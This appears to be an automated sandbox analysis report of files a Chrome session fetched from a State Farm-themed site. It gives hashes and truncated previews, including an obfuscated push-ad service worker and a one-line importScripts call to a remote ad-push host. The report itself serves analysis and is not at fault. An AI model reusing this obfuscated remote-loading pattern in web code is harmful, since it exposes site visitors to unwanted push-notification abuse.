                                                          SHA-512:E5D091DBE684B7AD20D731A4D570E527776CD7B9657B24525BFA567F8F1D120991E434D8FC5BF7CA7B6357342BFBE35923877C49FA122C8A7AEC24224D21F98D
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:L..................F.@.. ...$+.,....@.... ..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I{W......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V{W......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V{W......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V{W............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V{W.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..........._~.a.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (1977), with CRLF line terminators
                                                          Category:downloaded
                                                          Size (bytes):29245
                                                          Entropy (8bit):5.3291881479720855
                                                          Encrypted:false
                                                          SSDEEP:768:XmXDTstcu8g3hmxCgk6FrORgGxwEyF6A/BV:XmXqgk6FK3wEyF6A5V
                                                          MD5:137B48653BC54109B2DC05B3099BCA5B
                                                          SHA1:A1C27B0D0364D6BBE201787C9AE812E4E17F3658
                                                          SHA-256:BE4653DF522B239477DD263FE3CF12F15AD504013BC28637D6B94BAA9F08B4B6
                                                          SHA-512:89F1DF8743B0C61A0909A94230289D49D4E94B473EE87628D53E4737129C6A2D7DBAB42880A5EEEE65C98D7F8FFDA95F1CCF6FE1C750298CB8447AEC5EE8AAFA
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://pushrev.neptuneadspush.com/javascripts/trackpush-v2-cm.js
                                                          Preview:function _TRKPushDeferred() {.. this._done = [], this._fail = []..}....function getUrlVars() {.. var a = {};.. window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(b, c, d) {.. a[c] = d.. });.. return a..}....function urlBase64ToUint8Array(base64String) {.. const padding = '='.repeat((4 - base64String.length % 4) % 4);.. const base64 = (base64String + padding).. .replace(/\-/g, '+').. .replace(/_/g, '/').. ;.. const rawData = window.atob(base64);.. return Uint8Array.from([...rawData].map((char) => char.charCodeAt(0)));..}....function _TRKPushGetDeviceType() {.. var a = 1,.. b = "desktop";.. return function(b) {.. (/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 50x50, components 3
                                                          Category:downloaded
                                                          Size (bytes):1212
                                                          Entropy (8bit):7.487393417354084
                                                          Encrypted:false
                                                          SSDEEP:24:shtyXb8vXDm5UJkSqFSk2A0uESG9ENQXMdoakgqQkQQRV59BHHUGI:shfvTm50kSv9WH1kgsRV5HHHUGI
                                                          MD5:0B91B284D880829BC882F96C1EB2F21C
                                                          SHA1:06DD26BCBDE4B7A8981091D028A5664238CEC671
                                                          SHA-256:2AC98DE861AAE4984B0D4A2EAAF03525B8A230F6645598D7951AD970EB35193A
                                                          SHA-512:5F15C31A043F9AAB7404E161380176246372EA5BFE1D7F02A40D0355D8436A5AA559E4A47AA1FED664CCE3AEC6E84C297566655EE8DF989A2A915A02685B91F5
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://sofa.thriveuniversehq.com/people/2.jpg
                                                          Preview:......Exif..II*.................Ducky..............Adobe.d...............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#....#0+.'''.+550055@@?@@@@@@@@@@@@......2.2.."................................................................................!1..AQa"2.q.3....Br....RCS4D5.....................!1Q..A.q."2BRr.3.............?.W.....4.....20.g....CDN.1.Q[.N.o.Tp.G.# =..s..+......G\OJ.y[.}.~4.1.......6..#.....s..l/.4....,.hK..p..?..6W/..OTL.v.!..1..^Lw\..s..V.3,.. 9.k....3......R...m..dc.n8.G_..c.Xr.K|..B.H.5..v...Y..S..?.G~.........s.^E{..-....3..5ee.YJ.kV...Z..g\(.....o...EO.........pe....#.e.c..y.w%..V'..t.i|......+.&.U!.A........R.r..0.Jq..A.9R.............*.`........Z..^J..%V,.s.....5s..%...F...|.!. @....1..[.Z?.n.6.S..+.....G..=z"......U...2.)#.*.$....ku..)(..k..Q..U&.Q /.x.<....ta.y.#.c.....b..b*2-U.)......~'...U..l..........jc.8.C..B...J..;3.SN*..<1..S]\}.M0W.B.t..1.\{..D..p..og.a.........W....2..N=...I#x=$P.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 50x50, components 3
                                                          Category:dropped
                                                          Size (bytes):1250
                                                          Entropy (8bit):7.500751858824105
                                                          Encrypted:false
                                                          SSDEEP:24:shtyzont8Q+18Im/9uz0hu1x8Pxm0yhj4:shq718Im/9uh8Y0
                                                          MD5:1591D52A640D7AA975BDD1293FC54B6F
                                                          SHA1:91A7738FE43EE74E87BF615559B2D003D994370A
                                                          SHA-256:856A3E25E403C4F577C63B78A2EE734DEEDEB7B77FDB25A600B2A5DDED64F722
                                                          SHA-512:2FACE59C62E78E80DDCEC361F51C9DA9C5BCC6E1DB78141A5E029DBB511DA1C7EC889CEA59E0A85EFF8FF143EAA359E5FE5B6BAE1F1F4BA75B55A7F700D8E840
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:......Exif..II*.................Ducky..............Adobe.d...............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#....#0+.'''.+550055@@?@@@@@@@@@@@@......2.2..".................................................................................1.!.2AQ.q."BR3...a...b#...rT5.CS.4.....................!A1a.Qq.r.3C............?.e..BA..<.d..[.+....;4..9p....Q+.R9..O....l./..ep.X...^<.YZ&>......h.q.M..(.E.6.l.(.%..M..v..k>.2PA(.D.cYWP.*...T.l..7...[....T.....4....?..._.iN...7.a..cH....1.y}bxwR.M..iP......@.e......s.....g..U]~..}.s...G*3....H:FW..\..%o..{C.....J)w....m...=>.S.%C..b.\..`.M9G..S.li.g.#.1>.P.7ao..H.m..|o.9.@H.E.W.....b\\.q..pI...?0.0.....2.0....X..$......?u;..o..s..".vcpX..m.R[..6...9#......L.pi6..U..$....4..U.................6&.+.;.2.....-.6.[..].2...Y..)n[..qS..]U.H....m0D"..1..n.....)...oR....(.Gv.$...%.*..X...M.3...9M.y~..`..QB...........H$.....Y....k.b.F..f8..N..Oe......11."$2L/.7.....\.-...i..
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (9738), with no line terminators
                                                          Category:downloaded
                                                          Size (bytes):9738
                                                          Entropy (8bit):4.728754788881187
                                                          Encrypted:false
                                                          SSDEEP:192:MbaMb54a7tW39NFfaNFmyIPhZIogrRPM8UD9m0luevVgVZ4:UxtVuPr40lQ4
                                                          MD5:D4A8D59A54C0D3312FCB6E9C5CE7A8B7
                                                          SHA1:2165D6F0F7A6A14AA84D2B525C6726ED6BC6A54A
                                                          SHA-256:A1B5924D7D4BCFA97503BB44731598A1FE30947DA940E0BEF8273F2C199C61AC
                                                          SHA-512:0F8120CF37F4953D9068FB1B39ECD8336460B415D9FA741640462E8BEC5192977BB88BB26B33D4A6A0A9707216A66F2E126143A452636DBAFC93A03B258B0F2D
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://pushlite.neptuneadspush.com/javascripts/service_worker.js?v1
                                                          Preview:var _$_5575=["\x69\x6E\x73\x74\x61\x6C\x6C","\x5B\x50\x55\x53\x48\x4E\x4F\x54\x49\x46\x49\x43\x41\x54\x49\x4F\x4E\x53\x5D\x20\x49\x6E\x73\x74\x61\x6C\x6C\x69\x6E\x67\x20\x73\x65\x72\x76\x69\x63\x65\x20\x77\x6F\x72\x6B\x65\x72","\x6C\x6F\x67","\x73\x6B\x69\x70\x57\x61\x69\x74\x69\x6E\x67","\x77\x61\x69\x74\x55\x6E\x74\x69\x6C","\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72","\x61\x63\x74\x69\x76\x61\x74\x65","\x5B\x50\x55\x53\x48\x4E\x4F\x54\x49\x46\x49\x43\x41\x54\x49\x4F\x4E\x53\x5D\x20\x41\x63\x74\x69\x76\x61\x74\x69\x6E\x67\x20\x73\x65\x72\x76\x69\x63\x65\x20\x77\x6F\x72\x6B\x65\x72","\x63\x6C\x61\x69\x6D","\x63\x6C\x69\x65\x6E\x74\x73","\x6D\x65\x73\x73\x61\x67\x65","\x5B\x50\x55\x53\x48\x4E\x4F\x54\x49\x46\x49\x43\x41\x54\x49\x4F\x4E\x53\x5D\x20\x48\x61\x6E\x64\x6C\x69\x6E\x67\x20\x6D\x65\x73\x73\x61\x67\x65\x20\x65\x76\x65\x6E\x74\x3A","\x70\x75\x73\x68","\x5B\x50\x55\x53\x48\x4E\x4F\x54\x49\x46\x49\x43\x41\x54\x49\x4F\x4E\x53\x5D\x20\x52\x65\x63\x65\x69\x76\x6
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 50x50, components 3
                                                          Category:dropped
                                                          Size (bytes):1933
                                                          Entropy (8bit):7.679388477891866
                                                          Encrypted:false
                                                          SSDEEP:48:ZXUCFOvxXSsxw+Ct9hyXLkYWMtonip7YT:ZXUFJS+p29hEsM+3T
                                                          MD5:7394DA0F7C1EAF846C10D1FDD077AD8C
                                                          SHA1:B792BF129CE2801B9928D2F660CE8D0277E55CED
                                                          SHA-256:957FA9D8E22009502C40C12D830E48A28DE8CFDCEC5926BFB27830EF3B460611
                                                          SHA-512:7F4007C3BE12A595FA29AE2A6F291B15B6E7784EA4CBAE61369BC5F227E888938B1E0903549DDE4EB03274EDBD3B6F6FDD159E3BECD13E4BCE7F811A06D12AD5
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:......Exif..II*.................Ducky.......<......Adobe.d.................................................................................................................................................2.2....................................................................................!..12.A"34Qaq..Rb.Sc.5..TU.6...Br.#$D.7......................!1Q..A.aq."2...R..............?.|.:.}....4.v...(.&.BK.svR..&.C.....E..S...~..{9.Sj..:.T...P..r...`.qy....,.[?R5.eS\..0...9.1J...$g..oC...M.W.D..he'%n."....m.C}w..._^O/...".y&C".....\mU.Rh.w[..{+..KuVf...Dc...p6.j..J......V.+.o/..y>...j5..z.y.]..V=..T#0......c.6..!(.....[....C#6....S.kv....u.g.o..H....>......%.G.y.;..7..q.*g.d..@..G<..=..#O..|....x.%x#u.u.[..F%.5.&..A.d...\c...8..U...]F..I-^JS......U....7.[..K...9~N..@......[.w........4....a.T....).$}..;.;.....k.[I..v....P|...N...A.]7/..{mE1.v...KY..*.....@.N4.On)>`.Qu28.q...N..l..;...;.j<.=R...q .o...fv..~.w..m.....v-..x[M.I5...\.5QZ..gf5..<x_..x.l...Cv......
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1200x675, components 3
                                                          Category:downloaded
                                                          Size (bytes):160789
                                                          Entropy (8bit):7.975676812086097
                                                          Encrypted:false
                                                          SSDEEP:3072:UU0CiSdOVf9xJHpcjIHB8d7x9t8K3BPh6zoNIwK2ljx6ahZTM3O:xiSyWsh8dWK3BJ6w+2ljpM3O
                                                          MD5:6F200C08E5731E5F24F948ABD20346D6
                                                          SHA1:12B2E49C4B836F2EDF258E21D1BBDE1AA1F02DA9
                                                          SHA-256:3EF0935175018E558CCB82F27C3172D9B550F9C39188FB134207CDBC9C30F73A
                                                          SHA-512:8856E39CB73A5A68D0D2340E39E65D25D55DD5427E5725860D71BDD3755B953BB6FB1A849D30C7687AC4F86B9203DD5E615BDF7C66E6D72531C3D2AB2924B12B
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://sofa.thriveuniversehq.com/assets/images/state-farm-drake-2021.jpg
                                                          Preview:......Exif..II*.................Ducky.......F.....,http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164488, 2020/07/10-22:06:53 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 2021 Macintosh" xmpMM:InstanceID="xmp.iid:AA13D9CF5BEF11EBB172EE5B52C878BA" xmpMM:DocumentID="xmp.did:AA13D9D05BEF11EBB172EE5B52C878BA"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:AA13D9CD5BEF11EBB172EE5B52C878BA" stRef:documentID="xmp.did:AA13D9CE5BEF11EBB172EE5B52C878BA"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d................................................................................................................................
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 3840 x 2160, 4-bit colormap, non-interlaced
                                                          Category:downloaded
                                                          Size (bytes):44159
                                                          Entropy (8bit):7.810382073437664
                                                          Encrypted:false
                                                          SSDEEP:768:my5+/dw8sXeH2aRWRN2GuhD857F2miygJEj821Fu8B/YhSqF1bTGRG1U6:XMPKeH2EWLVuyshqj82W8JYh/ZaRG1P
                                                          MD5:4DDE29BF574584AC41B0B0D6A0A9AF4D
                                                          SHA1:E51DE0119C7CB1FDDE602FEAF121084F9FD38DE5
                                                          SHA-256:3C64D09C63D75D83689EA977B8FFF3EB371618F911EA58690866D83622EE5FAD
                                                          SHA-512:1BC29C89653A7724B5B48C5BBDEB82EF64567E67C6D5E2B6B683BD65D5CF7BBF1E55EB93A15B3B45FF28873AF6E07D328B52453CD7FE197CF4AF0BC55919BE4C
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://sofa.thriveuniversehq.com/assets/images/State-Farm-Logo.png
                                                          Preview:.PNG........IHDR.......p.....b..A....PLTEGpL..$..$..#..$..$..$9.&i....tRNS..#.M{3Kr... .IDATx..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ..FPUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 50x50, components 3
                                                          Category:downloaded
                                                          Size (bytes):936
                                                          Entropy (8bit):7.243288128343521
                                                          Encrypted:false
                                                          SSDEEP:24:shtyDkHqfxlftjvapBTVzR3KMSDfiAvKhK8:shz6vapBTSDfjvn8
                                                          MD5:3FD556959987D7B090E8AE4C7C8E07F5
                                                          SHA1:EFAB3432C13DB50F9001E8A2C9FED57292B7710A
                                                          SHA-256:D7532D53E07DE8CD28C1A4D98E284DF714255EC21C86D6756FE9261EC30691CF
                                                          SHA-512:241D2BFEFF38BAAD17BA96124AF453E0D3BA0B402F7C567C589D227F71A30863FC2B4BB5A2F3A4871FC589E95870D2308F0A8926D09ECA9E1FAD0BCB1928FAE7
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://sofa.thriveuniversehq.com/people/3.jpg
                                                          Preview:......Exif..II*.................Ducky..............Adobe.d...............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#....#0+.'''.+550055@@?@@@@@@@@@@@@......2.2.."................................................................................!.1.A.Qq.2.3a..."B..Rbr.#CS4.......................1A.!q"3.a............?.e.8...h...s.[7.I.>.,k[...U.Y,ty.b8*.|\..dJ.....".<J..........V~:..=..uk..*...J..6.-.T.0M+.....M....0i..nOG..\..,....vs$.....E.".}*."d...;... .....kS$)B.=.%....s|Yf..w....)^.O$]tb..L.I}.?`.Yi\Y..$.9F...I..-.......y.9..._CE.9.+....*....{R..........)..j...X.5.......*.K.D.h.#......D.X..B..Ds.........]8o.e.....P..+.-y2d|Mm.....L.!......c.KA.u.:......\..Z..#<...@Z.;.(...1.u.!..L.L2........8..W..u...ihc.F..C[W..../R.%...c.k....X.[&I......O3........G..?.J...7.,.x."..%~........=G/..<zw......t.g]u(B...v'....&.}...>.!Ql#.......<...t.W..pB...P..[..!g...
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:downloaded
                                                          Size (bytes):86
                                                          Entropy (8bit):4.5310227847269955
                                                          Encrypted:false
                                                          SSDEEP:3:JSbMtSdA7Q0EomGY5TH4YuaTDn:TT7soeZ4QTD
                                                          MD5:FC4E96F6B8578640B76AA6C3AA038377
                                                          SHA1:21BF78C6207C826D6C0AEA1341D0C00350C29A42
                                                          SHA-256:CA73F00B195132174473CA5BA1638EADCA425AF212A5CC43799355102B7BD01E
                                                          SHA-512:1F126022FB90AE8BDBD7E72251E24639A6103F451547939BCC9414396115BFCB612FC60987C910D5FE5C77681840E8EDEDEEFC80BA0350FB8F872A51C15678E9
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://sofa.thriveuniversehq.com/service_worker.js
                                                          Preview:importScripts('https://pushlite.neptuneadspush.com/javascripts/service_worker.js?v1');
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 50x50, components 3
                                                          Category:dropped
                                                          Size (bytes):1005
                                                          Entropy (8bit):7.267653088789914
                                                          Encrypted:false
                                                          SSDEEP:24:shtyS71YXcz8ZNXqIa0S6vp1o1jmL6OlI:shw/ZNaIa0SZ0mOW
                                                          MD5:C954BA990F4D77FE70114200E3A1AA32
                                                          SHA1:D78628EA691AE21EE498A0182920A98BB8E64E51
                                                          SHA-256:E4475CABE931A1F71DEEA2DB0509054D4261AF226673C9450F0085B82D6D123F
                                                          SHA-512:6398C81C51142F41D02EDB198322F1C5163F9CD6DE3BEA2B993322E8CB860AB22842D4437C62BA94EFC3FF6FC012BF8448F78E735BD7E7F60C3FC4D51FC6B638
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:......Exif..II*.................Ducky..............Adobe.d...............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#....#0+.'''.+550055@@?@@@@@@@@@@@@......2.2..".................................................................................!1..AQa"2.q.R.3..Bb..4.....rS.DT.....................!1Qa..Aq2r."R#3.............?.a.e.X..[V....c..+.e...2..Y..o>_.CZK\..m.B.6.B...\........L.'M..........58..'..3>.n....5..lY894.A-.UFJ..;-0.w..X....EIx......Rl.k....0..gB....G..@N......3...{]@~.?......U....5.^.a%+K..>aA...@.r..l.......Z.j..)./k{..=...E.v.lL..o....;.2.E4&.-d.....aq#.u.Q`s...\..Y]V.k@...bU.b2.E#^.......y.R.._.|...i}:..5...cs.f.6.*...f#.w...1....tW.3...,j.;.q.i...S.......vO.c..xG.j...k.d......3.H....,u...A....$..E.....K..3B....?......P..XJ.V...r...h.V.%,...\..>I............I.A.!...a(.....Q..'.'.E1.1$p.......X.5...6...j.._C=.-./.._T........B.*._..........3/9W.7...c..~...B...w2...bK../..I.|......}k..\e..*.....K..
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 50x50, components 3
                                                          Category:downloaded
                                                          Size (bytes):1933
                                                          Entropy (8bit):7.679388477891866
                                                          Encrypted:false
                                                          SSDEEP:48:ZXUCFOvxXSsxw+Ct9hyXLkYWMtonip7YT:ZXUFJS+p29hEsM+3T
                                                          MD5:7394DA0F7C1EAF846C10D1FDD077AD8C
                                                          SHA1:B792BF129CE2801B9928D2F660CE8D0277E55CED
                                                          SHA-256:957FA9D8E22009502C40C12D830E48A28DE8CFDCEC5926BFB27830EF3B460611
                                                          SHA-512:7F4007C3BE12A595FA29AE2A6F291B15B6E7784EA4CBAE61369BC5F227E888938B1E0903549DDE4EB03274EDBD3B6F6FDD159E3BECD13E4BCE7F811A06D12AD5
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://sofa.thriveuniversehq.com/people/1.jpg
                                                          Preview:......Exif..II*.................Ducky.......<......Adobe.d.................................................................................................................................................2.2....................................................................................!..12.A"34Qaq..Rb.Sc.5..TU.6...Br.#$D.7......................!1Q..A.aq."2...R..............?.|.:.}....4.v...(.&.BK.svR..&.C.....E..S...~..{9.Sj..:.T...P..r...`.qy....,.[?R5.eS\..0...9.1J...$g..oC...M.W.D..he'%n."....m.C}w..._^O/...".y&C".....\mU.Rh.w[..{+..KuVf...Dc...p6.j..J......V.+.o/..y>...j5..z.y.]..V=..T#0......c.6..!(.....[....C#6....S.kv....u.g.o..H....>......%.G.y.;..7..q.*g.d..@..G<..=..#O..|....x.%x#u.u.[..F%.5.&..A.d...\c...8..U...]F..I-^JS......U....7.[..K...9~N..@......[.w........4....a.T....).$}..;.;.....k.[I..v....P|...N...A.]7/..{mE1.v...KY..*.....@.N4.On)>`.Qu28.q...N..l..;...;.j<.=R...q .o...fv..~.w..m.....v-..x[M.I5...\.5QZ..gf5..<x_..x.l...Cv......
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 50x50, components 3
                                                          Category:downloaded
                                                          Size (bytes):1250
                                                          Entropy (8bit):7.500751858824105
                                                          Encrypted:false
                                                          SSDEEP:24:shtyzont8Q+18Im/9uz0hu1x8Pxm0yhj4:shq718Im/9uh8Y0
                                                          MD5:1591D52A640D7AA975BDD1293FC54B6F
                                                          SHA1:91A7738FE43EE74E87BF615559B2D003D994370A
                                                          SHA-256:856A3E25E403C4F577C63B78A2EE734DEEDEB7B77FDB25A600B2A5DDED64F722
                                                          SHA-512:2FACE59C62E78E80DDCEC361F51C9DA9C5BCC6E1DB78141A5E029DBB511DA1C7EC889CEA59E0A85EFF8FF143EAA359E5FE5B6BAE1F1F4BA75B55A7F700D8E840
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://sofa.thriveuniversehq.com/people/5.jpg
                                                          Preview:......Exif..II*.................Ducky..............Adobe.d...............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#....#0+.'''.+550055@@?@@@@@@@@@@@@......2.2..".................................................................................1.!.2AQ.q."BR3...a...b#...rT5.CS.4.....................!A1a.Qq.r.3C............?.e..BA..<.d..[.+....;4..9p....Q+.R9..O....l./..ep.X...^<.YZ&>......h.q.M..(.E.6.l.(.%..M..v..k>.2PA(.D.cYWP.*...T.l..7...[....T.....4....?..._.iN...7.a..cH....1.y}bxwR.M..iP......@.e......s.....g..U]~..}.s...G*3....H:FW..\..%o..{C.....J)w....m...=>.S.%C..b.\..`.M9G..S.li.g.#.1>.P.7ao..H.m..|o.9.@H.E.W.....b\\.q..pI...?0.0.....2.0....X..$......?u;..o..s..".vcpX..m.R[..6...9#......L.pi6..U..$....4..U.................6&.+.;.2.....-.6.[..].2...Y..)n[..qS..]U.H....m0D"..1..n.....)...oR....(.Gv.$...%.*..X...M.3...9M.y~..`..QB...........H$.....Y....k.b.F..f8..N..Oe......11."$2L/.7.....\.-...i..
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text
                                                          Category:downloaded
                                                          Size (bytes):4349
                                                          Entropy (8bit):5.340261967996749
                                                          Encrypted:false
                                                          SSDEEP:96:HYgLbVc+o7YgLfNHYgCiUVc+o7YgCigNHYgMiGVc+o7YgMieNHOL2PVc+o7OLPN3:4kjRkOpieRpirTiMRTiZAtBioX4WP
                                                          MD5:8BA897E4B08DBB7DBA54E9097838D53C
                                                          SHA1:FB2F05907656661814A29294BB3AA0236385F04F
                                                          SHA-256:40FBB198C4E89A4DEFF314243D0A689853F6D6537DD1E32EA2A559F3A1814F93
                                                          SHA-512:97AF8D52F4D76CCF2056CD9A24F74BAB6FA707918DFF97D3D043E644FF23F2A052902371963299570882FEA72E5D5D4D58A458B1D1E7AEE9C338657C87F4E9C7
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:"https://fonts.googleapis.com/css?family=Lato:400,400italic,700,700italic,900,900italic"
                                                          Preview:/* latin-ext */.@font-face {. font-family: 'Lato';. font-style: italic;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/lato/v24/S6u8w4BMUTPHjxsAUi-qJCY.woff2) format('woff2');. unicode-range: U+0100-02AF, U+0304, U+0308, U+0329, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Lato';. font-style: italic;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/lato/v24/S6u8w4BMUTPHjxsAXC-q.woff2) format('woff2');. unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;.}./* latin-ext */.@font-face {. font-family: 'Lato';. font-style: italic;. font-weight: 700;. src: url(https://fonts.gstatic.com/s/lato/v24/S6u_w4BMUTPHjxsI5wq_FQft1dw.woff2) format('woff2');. unicode-range: U+0100-02AF, U+0304, U+0308, U+0329, U+1E00-1E9F, U+1EF2-1EFF, U+20
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 31381
                                                          Category:downloaded
                                                          Size (bytes):12707
                                                          Entropy (8bit):7.981879268132132
                                                          Encrypted:false
                                                          SSDEEP:384:OOCD3Yvx1e6J4vNGWkdrOXOZP8O5V1/3gEIU:D6oF4cW0L45U
                                                          MD5:ED428747216361C25F70425C440F3282
                                                          SHA1:CD7D915D57A00356835F6DCE1102AE0D5283EE39
                                                          SHA-256:14076939402C4FA5A5FFCD3472871B2710338BBB58B9042147B93A028CD214A1
                                                          SHA-512:1508AA0367D24D98FA06FDD5F6433746CD780440A2D03D3A05C97832CCBA7AC1906FE68E9F4951B58E35B6865D31AC9AF22C1B1E72678B3A048939BD9C0653BE
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:http://svylst.com/js/ads.js
                                                          Preview:...........}.v.8...L.n2.hR......8?.8q.I..(l.DB..$..@..}........<........I...7;.'&..P(...B....s.."..,V.3.8.V!IG*Ace..XtTS......:*.8.....R....k.0......}$B,fEF..nJ.L.G...n..q.B.5.EN.~...j..w...kv.xN.Z.1NS[!....d..P.q.J...)..y...JT7.F...f...C...#.6...Yx.xF%q.....wn.............b...[n+g....6...~.(x....#.&..#l.w..8.......eRa..>.#.0r.a-..sK.i.q\5'.(vV.m.P.."H..#.1.p...D@...!.0..)..4.$L.-..S...c/r..;x.G....)...8B<.?......{...t. .}... ....YUOV..O.i.b.Mx..k..t.".+..ml;.r. >j...Kk..~..cc...9y#.....0.g...N...CnH\(.f...Gt...@;..vwm..w....[..L.n..l..U........yN`.....qX. >.a&.e...#yM..D.!....[...E...s.cI:^......h"....aP6H]=.........A....2..A.%B.....b..e.1`...R....yn;....&.&d..T.tj.`....6.....U..G....N..vw.......].=.+ {...../.N...<..Zf(z.."P...[....o.!.j.B.....#T..s.;e%(.J.@.......h%Ub....GH..jJ.N..-.q..6...J...B.'.. ;Xp.t.r.....s.G.%...}.zH..b...z.F..uH.%.UT.Cm.....6q..=.pT..5.N.Z.....C^5D_.#.."..:.6.>.........F.wJ......D}......k....`.ka....."
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:downloaded
                                                          Size (bytes):752
                                                          Entropy (8bit):5.244305016184475
                                                          Encrypted:false
